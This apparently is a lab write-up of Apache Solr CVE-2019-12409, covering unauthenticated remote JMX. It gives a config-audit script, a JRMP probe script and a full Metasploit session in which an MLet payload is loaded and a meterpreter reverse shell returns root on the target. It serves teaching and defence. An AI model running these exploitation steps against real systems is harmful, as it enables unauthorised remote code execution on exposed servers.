Apache Solr JMX Service RCE CVE-2019-12409

Vulnerability Description

Java Management Extensions (JMX) is a Java technology that provides tools for managing and monitoring applications, system objects, devices (such as printers), and service-oriented networks. Remote JMX runs over Java RMI: a client looks up the jmxrmi stub in the RMI registry and then invokes MBean operations through it. A JMX endpoint that needs no credentials is a remote code execution primitive, because the standard javax.management.loader.MLet MBean can be told to fetch a JAR from an attacker-controlled URL and instantiate classes from it.

In Apache Solr 8.1.1 and 8.2.0 the shipped solr.in.sh set ENABLE_REMOTE_JMX_OPTS="true", so bin/solr started the JVM with remote JMX enabled and with authentication and SSL switched off (-Dcom.sun.management.jmxremote.authenticate=false, -Dcom.sun.management.jmxremote.ssl=false) on the RMI port, which is 18983 when Solr listens on its default 8983. Anyone who can reach that port can load and run arbitrary code inside the Solr JVM. Solr 8.3.0 changed the default back to false; on the affected versions, set ENABLE_REMOTE_JMX_OPTS="false" in solr.in.sh (or require JMX authentication and firewall the port) and restart Solr.
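Because the root cause is a single shell variable in solr.in.sh, the quickest audit is to read that file rather than scan for the port. The following is an added example (mine, not code from the original post or from the Solr project): it parses the uncommented assignments in a solr.in.sh fragment and reports whether remote JMX is on and on which port. The three fragments are constructed samples, and the default-port rule (RMI_PORT is "1" prepended to SOLR_PORT when unset) is an assumption modelled on what bin/solr does.

```python
import re
import shlex

# Constructed sample fragments (not copied from a real Solr install); they hold
# only the lines relevant to CVE-2019-12409.
VULNERABLE_SOLR_IN_SH = """
# Remote JMX left on, as solr.in.sh in 8.1.1 / 8.2.0 shipped it.
ENABLE_REMOTE_JMX_OPTS="true"

# RMI_PORT is commented out, so bin/solr derives it from SOLR_PORT.
#RMI_PORT=18983
"""

FIXED_SOLR_IN_SH = """
# Remote JMX off; if it is needed, require authentication and firewall the port.
ENABLE_REMOTE_JMX_OPTS="false"
"""

CUSTOM_PORT_SOLR_IN_SH = """
SOLR_PORT=8984
ENABLE_REMOTE_JMX_OPTS=true   # unquoted value followed by a shell comment
"""

ASSIGNMENT = re.compile(r"^(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)=(.*)$")


def parse_assignments(text: str) -> dict:
    """Collect VAR=value lines that are not commented out.

    Values go through shlex so quotes are stripped and trailing '# ...'
    comments dropped, the way the shell reads them. Later assignments
    override earlier ones, as in the shell.
    """
    result = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        match = ASSIGNMENT.match(line)
        if not match:
            continue
        name, raw = match.groups()
        try:
            parts = shlex.split(raw, comments=True)
        except ValueError:  # unbalanced quotes: keep the raw text
            parts = [raw]
        result[name] = parts[0] if parts else ""
    return result


def audit_remote_jmx(text: str) -> dict:
    """Report whether a solr.in.sh fragment exposes unauthenticated JMX.

    Assumption (modelled on bin/solr): SOLR_PORT defaults to 8983 and
    RMI_PORT, when unset, is "1" prepended to SOLR_PORT, which is why the
    default listener sits on 18983.
    """
    vars_ = parse_assignments(text)
    enabled = vars_.get("ENABLE_REMOTE_JMX_OPTS", "false").strip().lower() == "true"
    solr_port = vars_.get("SOLR_PORT", "8983")
    rmi_port = int(vars_.get("RMI_PORT") or "1" + solr_port)
    if enabled:
        finding = (f"ENABLE_REMOTE_JMX_OPTS is true: JMX/RMI listens on {rmi_port} "
                   f"without authentication; set it to \"false\" or restrict the port.")
    else:
        finding = "remote JMX disabled"
    return {"remote_jmx_enabled": enabled, "rmi_port": rmi_port, "finding": finding}


if __name__ == "__main__":
    for label, fragment in [("vulnerable", VULNERABLE_SOLR_IN_SH),
                            ("fixed", FIXED_SOLR_IN_SH),
                            ("custom port", CUSTOM_PORT_SOLR_IN_SH)]:
        print(label, audit_remote_jmx(fragment))
```

To run it against a real install, read /etc/default/solr.in.sh (or the solr.in.sh under bin/ of the Solr tree) and pass its contents to audit_remote_jmx; a commented-out RMI_PORT line is correctly ignored, and the derived port is the one to check in the next step.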

Affected Versions

Apache Solr 8.1.1
Apache Solr 8.2.0

Environment setup

docker pull solr:8.2.0
docker run --name solr -d -p 8983:8983 -t solr:8.2.0

This run command publishes only the HTTP port 8983, so the JMX/RMI port 18983 is reachable only at the container's own address. Add -p 18983:18983 if the attacking machine has to reach it through the Docker host.

Reproducing the vulnerability

Check whether the vulnerable port 18983 is open:

nmap xxx.xxx.xxx.xxx -p 18983
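nmap only tells you that the port accepts connections. The following added example (mine, not code from the original post or from Metasploit) performs the first step of the JRMP handshake, the one Metasploit reports as "Sending RMI Header...", and checks for the server's ProtocolAck. That confirms a Java RMI listener on 18983 rather than some other service. The target host and port taken from the command line are assumptions; the byte layout of the reply follows the RMI wire protocol specification.

```python
import socket
import struct
import sys

# JRMP (Java RMI wire protocol) constants from the RMI specification.
JRMI_MAGIC = b"JRMI"          # 0x4a524d49
JRMP_VERSION = 2
STREAM_PROTOCOL = 0x4B        # client asks for a stream connection
PROTOCOL_ACK = 0x4E           # server accepts
PROTOCOL_NACK = 0x4F          # server refuses


def build_jrmp_header() -> bytes:
    """First bytes a JRMP client sends: magic, version, protocol byte."""
    return JRMI_MAGIC + struct.pack(">HB", JRMP_VERSION, STREAM_PROTOCOL)


def parse_protocol_ack(data: bytes):
    """Decode the server's reply to the header.

    A Java RMI server answers StreamProtocol with ProtocolAck (0x4e)
    followed by an EndpointIdentifier: a writeUTF string (2-byte length
    plus bytes, holding the client's address as the server sees it) and a
    4-byte int port (the JDK writes 0 here). Returns (host, port) on an
    ack, None for a nack, a short read, or anything that is not JRMP.
    """
    if len(data) < 3 or data[0] != PROTOCOL_ACK:
        return None
    (host_len,) = struct.unpack(">H", data[1:3])
    if len(data) < 3 + host_len + 4:
        return None
    host = data[3:3 + host_len].decode("utf-8", errors="replace")
    (port,) = struct.unpack(">i", data[3 + host_len:3 + host_len + 4])
    return host, port


def build_endpoint_identifier(host: str, port: int) -> bytes:
    """What the client sends back after an ack: its own host and port."""
    raw = host.encode("utf-8")
    return struct.pack(">H", len(raw)) + raw + struct.pack(">i", port)


def probe_jrmp(host: str, port: int, timeout: float = 5.0):
    """Connect, send the header, complete the handshake, return the parsed ack."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_jrmp_header())
        reply = sock.recv(1024)
        ack = parse_protocol_ack(reply)
        if ack is not None:
            # Finish the handshake so the server does not log a broken connection.
            sock.sendall(build_endpoint_identifier(sock.getsockname()[0], 0))
    return ack


if __name__ == "__main__":
    # Assumed defaults: loopback and Solr's derived RMI port.
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    rmi_port = int(sys.argv[2]) if len(sys.argv) > 2 else 18983
    result = probe_jrmp(target, rmi_port)
    if result is None:
        print(f"{target}:{rmi_port} did not answer the JRMP handshake")
    else:
        print(f"{target}:{rmi_port} is a JRMP (Java RMI) listener; "
              f"it sees this client as {result[0]}:{result[1]}")
```

An ack proves an RMI listener, not by itself an exploitable one. Whether the JMX agent behind it takes unauthenticated connections is a separate question; Solr's shipped options disable authentication and SSL, which is what lets the Metasploit module in the next step look up jmxrmi in the registry and load its MLet without credentials.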


root@kali:~/Desktop# msfconsole
                                                  
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v5.0.101-dev                         ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Writing a custom module? After editing your module, why not try the reload command

msf5 > use exploit/multi/misc/java_jmx_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf5 exploit(multi/misc/java_jmx_server) > set rhost 192.168.51.146
rhost => 192.168.51.146
msf5 exploit(multi/misc/java_jmx_server) > set rport 18983
rport => 18983
msf5 exploit(multi/misc/java_jmx_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf5 exploit(multi/misc/java_jmx_server) > options

Module options (exploit/multi/misc/java_jmx_server):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   JMXRMI        jmxrmi           yes       The name where the JMX RMI interface is bound
   JMX_PASSWORD                   no        The password to interact with an authenticated JMX endpoint
   JMX_ROLE                       no        The role to interact with an authenticated JMX endpoint
   RHOSTS        192.168.51.146   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         18983            yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.51.149   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf5 exploit(multi/misc/java_jmx_server) > run

[*] Started reverse TCP handler on 192.168.51.149:4444 
[*] 192.168.51.146:18983 - Using URL: https://0.0.0.0:8080/xln8izoCtDUbBVm
[*] 192.168.51.146:18983 - Local IP: https://192.168.51.149:8080/xln8izoCtDUbBVm
[*] 192.168.51.146:18983 - Sending RMI Header...
[*] 192.168.51.146:18983 - Discovering the JMXRMI endpoint...
[+] 192.168.51.146:18983 - JMXRMI endpoint on 127.0.1.1:18983
[*] 192.168.51.146:18983 - Proceeding with handshake...
[+] 192.168.51.146:18983 - Handshake with JMX MBean server on 127.0.1.1:18983
[*] 192.168.51.146:18983 - Loading payload...
[*] 192.168.51.146:18983 - Replied to request for mlet
[*] 192.168.51.146:18983 - Replied to request for payload JAR
[*] 192.168.51.146:18983 - Executing payload...
[*] 192.168.51.146:18983 - Replied to request for payload JAR
[*] Sending stage (53944 bytes) to 192.168.51.146
[*] Meterpreter session 1 opened (192.168.51.149:4444 -> 192.168.51.146:56234) at 2020-11-05 14:17:04 +0800

meterpreter >
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)


This post is licensed under CC BY 4.0 by the author.